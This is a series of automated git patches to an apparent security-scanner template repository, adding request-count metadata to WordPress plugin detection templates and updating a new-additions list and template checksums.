diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From e9b76176a1ca8fe18a7bca429805c5e15a0f91d2 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:26:51 +0000
Subject: [PATCH 0584/1090] Auto Generated New Template Addition List [Thu Sep
 28 17:26:51 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 46bf629ab9..a0a21fed53 100644
--- a/.new-additions
+++ b/.new-additions
@@ -10,6 +10,7 @@ http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/bitrix24-installer.yaml
 http/misconfiguration/installer/clipbucket-installer.yaml
+http/misconfiguration/installer/dolphin-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/klr300n-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml

From 0b21a18fc06761f263a5e16f2ad8746476ca3495 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:27:00 +0000
Subject: [PATCH 0585/1090] Auto Generated Templates Checksum [Thu Sep 28
 17:27:00 UTC 2023] :robot:

---
 templates-checksum.txt | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 2d84ed8375..5b3d1431d4 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4487,6 +4487,7 @@ http/misconfiguration/installer/binom-installer.yaml:5a0bda002247c3c4f299124b776
 http/misconfiguration/installer/bitrix24-installer.yaml:6ad2faf66db30c2430ed12cbc3a5de6f1d64badf
 http/misconfiguration/installer/blesta-installer.yaml:9bb3ce964212c9aeae365fe58ca43104b3ee2006
 http/misconfiguration/installer/circarlife-setup.yaml:2e1e2902cfeeb14c1ad2193c41f458af2347e092
+http/misconfiguration/installer/clipbucket-installer.yaml:7cb3232dbfe94a27dbdd16f71a40ae9828811c63
 http/misconfiguration/installer/cloudcenter-Installer.yaml:d0a27daa30662ca704278975f2d42cb0674fe479
 http/misconfiguration/installer/codeigniter-installer.yaml:b6bb44771d370c762ee7949160cad9898b995fb3
 http/misconfiguration/installer/combodo-itop-installer.yaml:ab717636cab6b04a4177a37f7e4626ebea300d5e
@@ -4495,6 +4496,7 @@ http/misconfiguration/installer/contentify-installer.yaml:01b08162e5f8aedb33ef67
 http/misconfiguration/installer/discourse-installer.yaml:cb0b7b3e155c1c0de7c5045e9e0d1995ae4ec7b8
 http/misconfiguration/installer/dokuwiki-installer.yaml:6374c572e83d21e097c6c4575a00f055fbdaaff8
 http/misconfiguration/installer/dolibarr-installer.yaml:c9a6ef34278cf9c4105dced3566ac2b7df607aff
+http/misconfiguration/installer/dolphin-installer.yaml:c0740a09077637b4f382be0e93f05f371e9f79e2
 http/misconfiguration/installer/easyscripts-installer.yaml:92d72e679b523393f6112e562059fab535189cb2
 http/misconfiguration/installer/eshop-installer.yaml:9a4171cee310d35fb79c45e59149aac43f158c4e
 http/misconfiguration/installer/espeasy-installer.yaml:a5b7bca27435a71326f650190739c4c5e6dea4ef
@@ -7196,7 +7198,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:144ebb428fcb7a4643ed1641dc6e2336705118d4
+templates-checksum.txt:2956ed9988fb90ac77bd13023db8f396510f4274
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 5711db4d2b304884c15e4ed48f8d47c56e646dc6 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:30:10 +0000
Subject: [PATCH 0586/1090] Auto Generated New Template Addition List [Thu Sep
 28 17:30:10 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index a0a21fed53..4478f0c4bf 100644
--- a/.new-additions
+++ b/.new-additions
@@ -15,5 +15,6 @@ http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/klr300n-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml
 http/misconfiguration/installer/ojs-installer.yaml
+http/misconfiguration/installer/vironeer-installer.yaml
 http/misconfiguration/installer/zabbix-installer.yaml
 http/technologies/blazor-webassembly-detect.yaml

From 17c5584d47011272c87f82beb6ff39aeb2883c46 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 28 Sep 2023 17:30:17 +0000
Subject: [PATCH 0587/1090] Auto Generated Templates Checksum [Thu Sep 28
 17:30:17 UTC 2023] :robot:

---
 templates-checksum.txt | 403 +++++++++++++++++++++--------------------
 1 file changed, 202 insertions(+), 201 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5b3d1431d4..78065ca63e 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -4559,6 +4559,7 @@ http/misconfiguration/installer/typo3-installer.yaml:cea5036a9a308c8fa323ebda044
 http/misconfiguration/installer/umbraco-installer.yaml:ef7468c1ebe40e3da73c58315dea9be9221b95e5
 http/misconfiguration/installer/unifi-wizard-install.yaml:d25fd90b41da9762fa2f736aaa281b17cd90eb9c
 http/misconfiguration/installer/uvdesk-install.yaml:320a11b9cea52323a096a72743f42a68748b9b35
+http/misconfiguration/installer/vironeer-installer.yaml:330fcfd818d15238cc8efc2dd17dd9e8f89b6e51
 http/misconfiguration/installer/vtiger-installer.yaml:076b0cac3812089d8b473161c128f1a51a850e4f
 http/misconfiguration/installer/webasyst-installer.yaml:45036a303e7bd289c6dee8ee6ccbaafcc78a9e1a
 http/misconfiguration/installer/webuzo-installer.yaml:af0d1ac1efe2f187e932031756dbde108aeb4927
@@ -5864,218 +5865,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
+http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
+http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
+http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
+http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
+http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
+http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
+http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
+http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
+http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
+http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
+http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
+http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
+http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
+http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
+http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
+http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff
-http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a
-http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e
-http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af
-http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb
-http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e
-http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7
-http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0
-http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9
-http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157
-http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a
-http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5
-http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e
+http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
+http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
+http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
+http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
+http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
+http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
+http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
+http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
+http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
+http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
+http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
+http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
+http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
+http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c
+http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
+http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
+http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
+http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
+http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
+http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
+http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
+http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72
-http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77
-http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb
-http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8
-http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1
-http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d
-http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0
-http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30
-http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb
-http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f
-http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2
-http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5
-http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a
-http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9
-http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33
-http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599
-http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1
-http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4
-http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e
-http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087
-http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d
-http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b
-http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b
-http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b
-http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0
-http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630
+http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
+http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
+http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8
+http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77
+http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e
+http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca
+http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa
+http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444
+http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016
+http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1
+http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba
+http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d
+http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823
+http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0
+http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24
+http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca
+http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336
+http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a
+http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3
+http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3
+http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae
+http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053
+http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0
+http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214
+http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc
+http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb
+http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9
 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913
